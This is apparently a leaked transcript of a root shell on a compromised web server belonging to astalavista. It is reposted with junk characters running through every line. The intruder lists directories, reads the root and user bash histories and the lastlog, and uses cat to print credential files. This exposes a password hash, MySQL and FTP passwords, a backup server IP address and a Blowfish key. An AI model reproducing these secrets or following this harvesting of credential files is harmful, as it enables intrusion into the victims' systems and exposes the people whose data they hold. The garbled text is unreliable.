' V' r* P, Z& l; c- h7 bastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::2 d4 _8 `9 `, K' a7 C4 d
0 t4 E. {5 D! k; `- h$ y
sh-3.2# cat /etc/motd
2 x8 o3 @4 n4 r( ^ {( e* Q3 {( u- Y#####################################################
: }4 a% R! j3 O3 G. N- Z' K. y#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #$ R) {6 w: J, S
# |__| [__ | |__| | |__| | | | [__ | |__| #( a! I& m* ~/ \5 D1 m" S5 L* H* V
# | | ___] | | | |___ | | \/ | ___] | | | #
1 x( t! X* z- T1 h4 B9 U# #
! f% U7 u9 H& x, i#####################################################
- S! u4 E3 W1 _& m5 v# i. S# #' v. |; c& |% ~0 D* w
# Admin Contact - 链接标记support@secureservertech.com #! ~: _$ g8 O6 \7 v' g
# #
( B6 }/ Y- X: D- v. f* E7 n; V# Available ShortCuts #
* @9 s) I w; c: o# #7 Q; g0 |- Q- z) N2 V% t5 y
# nst - list active connections #
1 p3 Z$ D, Q/ W* y7 }! Y# ddos - shows how many times each ip is connected #
. O: C# I8 `3 I" {# t# ltr - restart the webserver #2 k/ F2 }: \( I7 g; S, p
# phpc - edit the php config file #
- v/ X9 b1 H- `* A3 @1 x# htc - edit the webserver configuration file #4 f& B" X. P' A: v4 z0 ~
# up - uptime #- B' ~2 J0 r' r3 I' P
# etd - edit the motd of the day file #' P* i+ V4 L6 A
# htr - start and restart apache if needed #
. B/ x3 p4 V' I4 W* C# syng - shows active SYN_RECV connections #, Q$ \8 |* m2 E# R% t
# synd - syn flood blocker - “synd -h” for usage #& l6 j' t1 U- q* U8 j$ A e
#####################################################
7 W2 ?0 V$ w7 [3 X# NOTES: #- W! Q9 c! T7 r) X5 i
# Last Upgrade - 12-08-2008 by JF #
6 n1 V' W Y$ y# My.cnf/Mysql Optimization - 1-28-09 #
# V! n. E- b( `4 L4 \. b) _# #
5 k$ M0 W% W5 @; C* B# #3 k7 l' Z# L( i( T" z3 z
# #
) Z' | |1 K, s7 H4 S* y#####################################################
/ D" }: f' U( q6 O( g" i! \* B& }% s+ n
sh-3.2# lastlog | grep -v Never
8 a R; g; j1 k1 RUsername Port From Latest a" i' y O: B8 V) Q0 v
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 20093 D* U* u* T, b; M
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 20087 r1 F- ~% F5 H: `* ^9 }& o! \/ M
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009
0 Y$ J( s o: yastanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20091 C2 s" h/ a, S. m6 S, c. G
' w+ b2 Q# p! ]) J. C. B# j1 S. g' t
sh-3.2# ls -la4 z% j- X8 W9 x# K6 ? C
total 453376- { w# h6 X# O" B3 F: I. p& |. J
drwxr-x— 15 root root 4096 Jun 4 08:40 .8 i8 y2 M7 F. V
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 N! _+ R( C* w-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
' S1 F0 k! U1 w6 _4 G# ` w-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg+ V, `. V, `& K% N s" D, ~
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
2 k" J1 M l( M) J. B: o7 s-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout, M# E: Y7 Y+ R6 o* _
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
# q6 t6 I9 w9 i-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc! x7 n, r3 }5 E( m5 ~
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
2 A8 R+ a8 i) t% I u- R-rw-r–r– 1 root root 1327 Nov 29 2007 cert
/ C( x0 \3 T9 L2 T9 |. l' U- r% s-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
" `# Q) U) j0 X9 h( Y; H+ ~drwxr-xr-x 4 root root 4096 May 20 2008 .cpan
0 G" n" _! |* w t-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
T& m0 T; y' `" O9 |-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
3 L1 ^3 k# F9 ~$ A8 I- d9 f- Sdrwx—— 2 root root 4096 Oct 28 2007 .elinks
( N! {' b/ C7 k8 Y: o% r8 G+ tdrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.10 C2 g: V: @( P2 u" r) G+ C0 s" B
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2+ c" e. {+ s2 v x$ _+ y
-rw——- 1 root root 0 Apr 16 13:19 .history( t, }+ l) P* G9 ^6 ]+ X" a
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log4 K. T* z0 P: c! G& l. o
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog' \% q, }! a* r& W& V
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
* K% \3 F1 \8 p( B5 S: _( U/ Q" E-rw——- 1 root root 35 Jun 2 14:23 .lesshst0 \1 h4 @+ ~# w: T- I3 T
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp8 V) s8 B; ~2 ]2 ~. t Y
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
: w+ b3 m; C6 D& m# Q0 p-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
7 X' B0 v. ?9 L9 @' Y& t-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz21 K0 f$ _/ I' ^5 L- y" d% H
-rwx—— 1 root root 760 Sep 18 2008 lp
+ d1 B$ R8 d/ C. i4 ~# G! Udrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1- Z6 E2 B9 D8 r8 O; y r, D
-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
6 C7 o0 m( t K1 y- U7 a7 Z6 d" U-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1/ O+ O' ^. Q: a9 R! e- h
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
( n0 J6 O1 e) R: Q' v/ _-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
! ]9 G5 S1 N8 u' j8 f/ |) p* xdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3; F* ?2 K) |' h
-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz- c1 Q+ ]/ k. w; R
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh% P! z. `6 U5 s6 |) P- h G
-rw——- 1 root root 41 Oct 19 2007 .my.cnf. [5 \9 P2 Y1 L. q
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history( ~) i5 Y' s$ z4 ^1 n
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport( e7 i- `# o: e5 ?. q: W, A
-rw——- 1 root root 41 May 20 2008 .mytop; z: P, p9 A6 L2 _" L, h7 Q0 t
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
5 e4 F8 U6 B! r, J* Q-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz8 |# l8 k! e+ x( V# `
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
0 k X" Y) M# A$ g-rw——- 1 root root 1462 Sep 21 2007 opt.php
2 S' ]; n: `( C9 q2 k% y6 d-rw-r–r– 1 root root 3371 Sep 22 2007 p
0 Q5 p3 V+ p" t. h-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2
3 k2 b( d; V) T# [6 R, W" d-rw——- 1 root root 1024 Feb 3 21:32 .rnd
, f9 s' {( f" X' \8 |9 w. n8 Y: g; z-rw-r–r– 1 root root 716 Nov 28 2007 server.csr) u( u" ^: f4 s6 M8 ?
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
1 {" E. z3 _9 _, @0 I. B- S- ndrwx—— 2 root root 4096 Oct 10 2008 .ssh/ Y# w. ~; A1 A- q* p
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
& j7 U1 c' v' d G! j: B- t: v-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc& i: G+ h+ @& M) g0 B
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip [, s" {& Z( c- C
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
( D2 A+ d0 E1 _ ]% g. Z% Edrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
" Q+ j. q; d/ b9 c/ d-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh Z0 ]& V! J. n
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
2 J: x2 d3 B6 n# y5 o; @-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
6 h% r7 A! r' C6 C5 _# ?- k6 J/ b-rw——- 1 root root 12997 May 16 2008 .viminfo* V+ r0 o4 R% h, g
( L0 q( n1 e. z7 Psh-3.2# cat .bash_history- w) E, d9 U8 X5 M7 z& d
[snip]3 h8 J$ x! G; l( V7 p5 i
wget cp4sst.com/sstlinux.tar.gz
1 f& O% s2 p: {4 J- btar zxvf sstlinux.tar.gz& G/ N& y. J+ D. \ B/ K9 ~: R8 J
cd linux-2.6.27.105 }1 ~" U6 i4 G: @. e
sh install.sh
( p# t* V: U2 X Umake bzImage ; make modules ; make modules_install ; make install
, y; H7 H. f+ {( X$ x2 s4 cmake clean5 s$ K8 ?0 @# S5 R E2 z
service mysqld restart
2 r9 k ~4 \/ D7 t: s! {% X* z[snip]
: S* p* Y4 f/ F6 f- J! P' _$ |7 Scd /usr/sbin/
* e$ i' @0 m, w( }6 Cchmod 4777 traceroute
( y" }+ ~# N' [' f3 ~ Lchmod 4777 ping9 S7 S- F+ K; x3 O
traceroute -I 链接标记[url]www.astalavista.ch[/url]
* ^, l& b) U% a! X/ R$ t[snip]
, Z! {! @/ d6 _* f1 I+ k9 rvi /etc/csf/csf.conf
u5 r9 D" O9 p8 @traceroute google.ch
, S* P- u& W% d) w- yservice csf restart
* [2 {4 X2 G. H# E) E+ ztracert google.ch
+ j- h) ]- ?: gservice csf restart) W* m# J- i2 F; ~0 \/ `0 {
traceroute 链接标记[url]www.google.ch[/url]
1 ], J( g6 l; a) T9 |% y# ~8 Itracert 链接标记[url]www.google.ch[/url]
. M, `3 `6 D9 K6 n4 {traceroute 链接标记[url]www.google.ch[/url]
* l8 j3 v' m! H6 ylocate traceroute
2 S5 s0 F1 Y/ E% {- P e3 F$ Ichown 4755 /bin/traceroute4 h }4 F4 I8 l$ C, p5 m
chown 4777 /bin/traceroute [$ _8 c; P/ d3 _; O T
locate ping
/ u, n/ O+ i# B1 U9 A1 A: N+ d; vchown 4755 /bin/ping
1 Z# ] Q# |" ^. Vchown 4777 /bin/ping( H; y1 C% N; Q% o0 h% O, Z; V
cd /bin/
3 \2 H% G& s9 ~: `. Vls -ali | grep ping
. G6 U; X) d1 q7 q4 m) vchown root ping
( `8 _/ Y, L! hchmod 4755 ping* ^, L4 E8 s7 [
ls -ali | grep traceroute7 p' e d; S% r* n8 M
chown root traceroute( A, |! V2 b$ R! |, w# j( j
chmod 4755 traceroute+ r& l7 |: R$ s
ls -ali | grep traceroute$ z0 L8 ^0 X( R0 u
traceroute -I 链接标记[url]www.google.ch[/url]8 s7 r9 V3 j3 N+ _) V. r4 j9 r! ?
traceroute 链接标记[url]www.google.ch[/url]6 S+ j: p4 Q M. S1 V
whois pmsantos.ch
5 Q; e3 i# m7 a1 U* P$ Y- A' a[snip]
5 ]1 H7 I5 D$ ^3 |mysql -h com_contrexx2_live < /root/defaultp_ports.sql
/ F/ u0 F- o8 n8 H: O' b4 tmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
+ e1 w3 ]- K5 I* ^" \9 Pmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql/ y) ?1 Z: w6 s- e7 l3 ]( M
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql1 b$ l. h# i- S m7 R. v0 r
top
* S! z$ C4 k3 x6 h, s, _# n- Bping ssth.ch
0 j7 ^4 |. a1 U( @( U% o [1 y$ Jping asdlkfaljgasd???ljg???lasj.ch/ [" G# i# f, I7 [* y" q
ping asdlkfaljgasdlasj.ch
- u/ E7 M1 P* ]: _7 lping 链接标记[url]www.ssth.ch[/url]
" x c, c# i9 `1 C" J2 [ping ssth.ch( W7 k" q9 @7 d2 R- H; G) r; w0 m" `
nslookup 链接标记[url]www.google.ch[/url]
$ O! u# L! k+ w+ cnslookup 链接标记[url]www.ssth.ch[/url], a; P9 f! U% q; n% {
man nslookup
6 l# G3 L# k; @& ^+ c/ Y" Sping 链接标记[url]www.google.ch[/url] [4 D0 H) h9 k+ e- e* R4 _
nslookup 链接标记[url]www.google.ch[/url]
* c+ V! L' `; V2 M2 u8 Y1 o) nnslookup 链接标记[url]www.google.ch[/url]
' o1 W/ t. q5 a. W: U: bnslookup salfjasdlf.ch
6 H/ g$ W6 R" @- E6 r- ]& n[snip]: ]+ E# D. B8 b) _1 V
openssl passwd -1 sadf$ X4 Y1 S' T$ |+ W; k5 Y
openssl passwd -1 5cZNHstdTy1 T! B! l# ]9 b: U/ v2 o
mysql, J8 j: O w g, G n3 i6 q+ Q( ?
mysql5 Q% ?! W2 [$ A, O' d
locate proftp
, P! v z' X8 S& T. {$ c% Hvi /etc/proftpd.passwd! z+ C' @, Z0 C( Q$ W1 J
service proftpd restart
) W* W6 N% d& E8 q' Z3 blocate proftpd.conf' @& q/ }1 y- p) |6 g6 K- i
vi /etc/proftpd.conf( ?6 C, }+ C2 }1 r) E' ~9 T
vi /etc/proftpd.passwd j7 r. H5 B% M6 L* f/ o
service proftpd restart6 ?- R8 a% T1 y8 ]; P
[snip]4 Z3 r* @" w; E: a, Q& W/ g
/bin/sh /home/com/backup_system/backup.sh& i- w O( Q1 U, z7 W1 W) c
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin/ a% s; {0 w1 r S6 L6 X' l' s
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
: \: o d7 e* y9 L/ xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql7 r- Q/ h' h# x" K, G/ O0 z: S$ a- B
ls -ali a9 T1 d3 e% G! a
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql8 W( L$ E9 y' W3 m& o$ i. A
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
$ g @* y3 R: J; Ncrontab -l
9 N# l4 v4 r1 p/ e, i' S5 Ucrontab -l3 H0 O5 ^9 R5 o& q% c
php -q /home/com/public_html/modifications/cronjobs/securitynews.php4 n; u. \2 {/ `. Z* w
/home/com/public_html/modifications/cronjobs/exploits.sh
1 ]3 ]7 v3 W, P G8 v) hwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url] ^! Z2 n4 y& X
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
5 [, _: X' f+ T- d, \* g& xcd lsws-4.0.3
" G* Y4 k$ `0 E. I; F0 Psh install.sh
7 V/ ]2 Z8 r1 A; i+ q) @# _uptime
: n- l2 m- p, [2 J# ~3 Ehdparm -tt /dev/sda
Y' p' [: t9 u3 o; T" A% Hiostat" u' B/ V- Y' M
yum install iostat7 ]( G: O. ?0 D3 x; c3 ~7 g4 Q |
iostat8 ]5 o# Y- w" k' `/ w' J# i
whereis iostat
0 Z% U9 T& D6 Q! y: E, ryjm clean all
- V$ t; a7 O. l n/ Fyum clean all ; yum -y update" z6 i8 _1 W: ~0 u
iostat" C+ v3 e( V% l I6 P# k& K
yum install systat
& e3 l+ |5 O* r5 @/ M F# urpm -qa | grep iostat \* Z% v( B) I d' K0 k* Q& U
rpm -qa | grep sysstat
t5 k$ X2 D- M+ W, Z7 mrpm -qa | grep systat
4 e$ x* a6 Y. n8 _. n7 G+ u0 ?dmesg -c+ D# C. }4 x* y' W0 V9 ?, _: c
sysctl -p
. [- `1 ?2 N7 s# a, f! Y' a+ nuname -r3 O9 w2 a$ S- K' X
cd /usr/src$ r" V7 W$ n8 q; ]( P! ~5 k
wget nix101.com/kernels/sstlinux.tar.gz Q0 r; F; e6 A. P
shutdown -r now' D+ O1 j1 f5 c$ |, h
nano -w /boot/grub/grub.conf: ^; {5 M2 B5 D
* J0 Q0 t* z9 J- {2 p2 ~
sh-3.2# cat .my.cnf$ H z4 S; A P; E N
[client]
( A% p$ k. y/ p- @2 n5 f4 [user=da_admin
0 b6 `4 P2 {4 \3 Wpassword=X9dctmRH
9 S6 U# N7 P& u# r5 f: x8 h" K3 U) I7 x; y$ U. y2 _' g
sh-3.2# cat /home/com/backup_system/backup.sh
9 |- d- h, }$ i/ ?6 t$ o#!/bin/sh7 n1 X' t2 [: {6 z7 M+ u
#####################################################################; _! l2 V4 t- [0 V" d
# #
1 i# }* `$ l8 |; F6 L& g# incremental backup for astalavista.com # j# t# i/ y) |: ~. \
# #, Y, P1 i1 o* L+ D
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #
1 Q4 y- {7 E' B+ J3 s# #
- p4 p* u- U$ A: B" X#####################################################################
) \( C2 d( A$ p[snip]
& }! u8 D* b! S; c; RPROG_DIR=”/home/com/backup_system”;" k* B) f$ I: `" b0 C
BACKUP_DIR=”/home/com/backups”;
# K& X& z, M: x& gDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
/ Y) _& q' d" D+ Q. l# ftp for synology backup server$ N3 i& u0 V. A" Y" Z) S0 }
FTP_HOST=”212.254.194.163″;4 W( b; K+ @' K# V z- H& J- B
FTP_PORT=”21″;( L% L0 o" K7 R8 _
FTP_USER=”astalavista.com”;# t* i4 J! Z* H
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
7 r, p ~5 m1 ?3 h' ^% W4 \% OFTP_DIR=”/astalavista.com”;% g+ A! p' x s2 i& ^
# database7 ]: p( h) B8 [2 O7 x: Y: r `; e
DB_HOST=”localhost”;3 a- U* i9 y$ C9 M% s
DB_USER=”contrexxuser2″;1 b+ P/ [2 O: a* i& u5 i
DB_PASS=”0fEYNZgXz1pKe”;3 W+ V* u' S+ O/ M8 X7 j3 B5 A+ |
DB_DATABASE1=”com_contrexx2_live”;
7 w- z% }. r6 X. hDB_DATABASE2=”com_contrexx2″;5 W* R( [5 Z" ~2 l$ B% l, x
[snip]* p0 p4 R7 |/ d& ?' _2 i' B9 x
ftp -in $FTP_HOST $FTP_PORT <<EOF5 d7 g- h# r+ v$ N, Q$ p0 h+ q
quote USER $FTP_USER
, J* }# L1 x1 m; Wquote PASS $FTP_PASS' W. A I% S; g
cd $FTP_DIR8 Y6 b: D. W) g
put $DB_FULLNAME-SQL_Dump.tar3 G1 o9 f" D0 ^" D. j
put $BACKUP_FULLNAME-Public_HTML.tar
9 i- I) N2 E$ c- D) T0 _- Cclose
% O; t; R( i. D+ }bye+ X5 i, `2 R: A0 ^! R1 H& d2 j
EOF
! T8 n+ B3 ^4 ], L d$ T2 w9 C: c* K1 J) X! L! M
sh-3.2# cd /home
7 f, r: J# [5 f4 Y' nsh-3.2# ls -la
1 ]: N; r2 M- L# e. _, l# etotal 120
. X2 i7 ~* X8 H) J; t$ Edrwxr-xr-x 14 root root 4096 Mar 11 17:56 .: t. m2 x' u8 d% X9 y
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..$ ~5 `# N9 a. j4 B. _5 P
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 Z0 O! \ G. P; D2 m
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group6 r) Y F( i9 y3 j
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
, V: ~: v( g c% y. z# ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet: \5 F" p2 T2 k4 ?2 [3 u
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup
9 g8 F' R8 p5 D( Jdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161- k; @, @; v6 f6 \3 L6 k, F
drwx–x–x 10 com com 4096 Apr 28 12:40 com R B$ k a# I
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
0 B/ @; M0 o9 d: tdrwx—— 3 jon jon 4096 Sep 21 2007 jon
3 V ]' k4 D* Q6 Zdrwx—— 2 root root 16384 Sep 11 2007 lost+found
8 M8 D% o4 R/ G6 N; \5 V5 ]drwxr-xr-x 2 root root 4096 Sep 14 2007 my. T( G3 u# |# ^
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata9 }/ g7 F! G. e7 @& A" `' n
drwx—— 2 jon jon 4096 Sep 15 2007 test; s! t8 a( o, S( r0 g* g
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( }) x4 Q, c3 c8 w
8 U1 `, ]* S7 {5 a9 Z+ g# c9 y6 L; }
sh-3.2# cd admin
+ B8 J+ H# p* g" u. d8 rsh-3.2# ls -la
6 P, F9 E4 A) ]6 Btotal 1735896% w; U& m% n! G* I0 v; u
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
; P: b' \3 X' ddrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..8 u' E# _/ ]) Y" i7 E3 D/ C
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
& m5 Z2 ^6 E1 h) Ldrwx—— 2 admin admin 4096 Sep 28 2007 backups
& {+ ^2 p# r6 s2 L2 a$ y) B3 Y-rw——- 1 admin admin 860 Sep 17 2008 .bash_history* R- O5 m" v* v3 A6 L. t4 t( l
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout/ N3 D/ S3 u6 C: X! w% n
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile
* c/ Y" l3 P* E+ e5 @! k-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc3 C1 t9 Z2 A. h, G7 u+ L2 @ D8 ], J
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
. y2 w+ ]% F* I2 S" W6 sdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains9 L7 q6 H8 C9 `$ S7 K/ {; e
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap! B3 _ J4 y% t c
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
6 u+ u/ E, ?) sdrwx—— 2 admin admin 4096 Sep 21 2007 mail
6 J- G5 C- y" z2 ~% m9 B, @-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
2 C% Z$ O8 [8 Y* S# [% L( E-rw-r–r– 1 root root 887 Nov 28 2007 server.key5 K- \( t0 i+ m+ C x
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
& }# W! } t$ i" ]9 p) P-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz: K% T$ }$ V6 d: h# r, d
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups3 v( H" I n$ H* W
+ O/ F$ A( f5 p" K; z, c
sh-3.2# ..
+ |( H# B' o2 b- U5 o& Ush-3.2# cd jon
% a+ L5 P% ~' \- qsh-3.2# ls -la
4 G- a, c2 G D! R, mtotal 36
! F- \8 p5 P' y! l$ w4 }drwx—— 3 jon jon 4096 Sep 21 2007 .
% _( y( L8 N7 u$ x( y! v. U. ~drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..) Q L+ ?, z. c6 m
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
8 C0 A: k$ F! t-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout, `* I% u2 }7 [
-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile0 T: j5 s F1 W; b; o; D1 i( ^
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc2 A- W; b/ i$ C7 C7 T }
-rw-r–r– 1 root root 24 Sep 21 2007 info.php8 U) `6 I; s# q
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html; o8 O5 N: X$ S* ~! {7 [
# i X: p4 I$ c8 J, s. Esh-3.2# cd ..
" s: `& @& A2 f6 o! f& ush-3.2# cd test
: I: N" \/ a7 r! |$ _5 ush-3.2# ls -la5 n# Z% v( z9 J. J$ d: l
total 48
; o; m, g ^3 T& s, ?drwx—— 2 jon jon 4096 Sep 15 2007 .& Y3 ]- @1 v$ ~8 o4 d- ~
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 h; X# z* W* p
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
% T* u6 n7 ^1 R+ o. j" k9 d2 j-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout* m' B0 Y2 {( A/ m+ n+ i& V
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile
% x# E( z9 ^, Y: r* p-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
, r/ h* |3 p/ ~; H& ~, j! Gsh-3.2# cat .bash_history9 N# D+ f8 z# k( {! {. i
/usr/bin/mysqladmin -u root password PoliuJhytg67
: o$ n9 \- ]2 Y+ k) j
8 f" s+ L$ O; D/ |/ Bsh-3.2# cd ..
6 x1 |: K$ ~' W$ Tsh-3.2# cd astanet1 j% ^2 t0 W4 D3 B5 L
sh-3.2# ls -la) z. ?5 _& d, e+ k; w3 A+ L& A+ \0 ^! y
total 52
/ ?' p" U- c6 t# Cdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .& g6 [3 f: S( V+ l( a1 O* A1 d* S+ c
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
& l) i# T+ Q' Z6 b( \/ I+ h2 Tdrwxr-xr-x 2 root root 4096 Dec 23 16:00 auth% ?" v! ~9 ~0 R8 k* _
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
& u; ^9 T/ a+ K! {$ T-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout9 C3 ^* @4 @ {
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile3 m4 n; F6 j1 e
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
+ z! n Y% R' I; p/ R( Q$ ~drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains; c* Z0 M8 A: ^* Z9 i, x# z
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap- l9 X9 z) ~+ e, G. x: m
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail( X! s* E: B! v
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
* b+ ~" F* z% A* i: Rlrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html6 u; z, U' x ?7 X: s# m
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow( ]5 u) Y1 U/ G9 I, `" ~
+ K/ m. l" |3 O) v& _3 {
sh-3.2# cd auth/
7 P5 I5 k7 V; W* U: [, G- Y, N) Y- qsh-3.2# ls -la4 b9 `: ~4 e2 ?) k
total 28
8 }) ]2 E* o" }# n/ q' f0 D4 \drwxr-xr-x 2 root root 4096 Dec 23 16:00 .# O* A. \6 r! B# z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..5 G! E8 M0 J! d# \+ r4 ]! B
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
9 J) {# Q) r9 l' D7 c* x-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
+ N) |# M: K% y) D2 j3 Z-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd i$ |2 Q( D3 P+ l
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting6 S% K9 z% g$ G3 `) B
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd) r4 s3 c4 s; A- W
) O3 K; u0 P! h& w- ]# Y# Vsh-3.2# cat hackercontest.config.inc.php4 N; w9 }# D( h
<?PHP& f9 h7 o4 [3 g+ g& M/ N
// Variabeln f?r Verbindung zur Datenbank //
+ m' E' b! b4 G' m4 T8 a$conxHost = ‘localhost’; // MySQL hostname
' J0 W/ [. y5 w$conxUser = ‘hackercontest’; // MySQL user4 d! z! u+ o5 H# J; S) t/ [
$conxPassword = ‘K6m@7dUc’; // MySQL password2 y( q9 B$ ^. D4 I
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
* A4 w( P1 ~/ t& }?>0 N! y* K# r' B g
sh-3.2# cat hosting.config.inc.php7 R- Q H8 c, ~% U2 h# ]9 j& u7 L
<?PHP; o5 G, _! s+ d" T4 ^- S. o9 K3 i
// Variabeln f?r Verbindung zur Datenbank //
( ~5 ^; }& J) d; T: r1 h1 I$ F" E$conxHost = ‘localhost’; // MySQL hostname" v {+ e0 l1 K3 H! n9 z/ @
$conxUser = ‘hostinguser’; // MySQL user, J( _1 k' R. h2 \
$conxPassword = ‘cXvB3981′; // MySQL password9 q( M3 S4 @# c/ B( b7 z6 w! x$ o
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish8 O; F6 l' J0 s4 d
?>
5 j) [4 k. y- `) b0 T, E* B7 D# P1 U
sh-3.2# cd ..
